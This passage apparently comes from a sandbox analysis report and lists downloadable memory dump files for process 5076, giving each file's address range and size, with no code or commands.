memory/5076-394-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/5076-395-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-396-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-386-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/5076-398-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-400-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-401-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-399-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-403-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-404-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-405-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-406-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-408-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-409-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-410-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-412-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-414-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-416-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-387-0x000000000043168C-mapping.dmp

Download
memory/5076-420-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-422-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-424-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-426-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-425-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-423-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/5076-421-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-419-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-417-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-415-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-413-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-411-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-407-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-402-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-427-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-428-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-430-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-429-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-431-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-432-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-434-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/5076-435-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-436-0x00000000772F0000-0x000000007747E000-memory.dmp

Filesize
1.6MB

Download
memory/5076-437-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download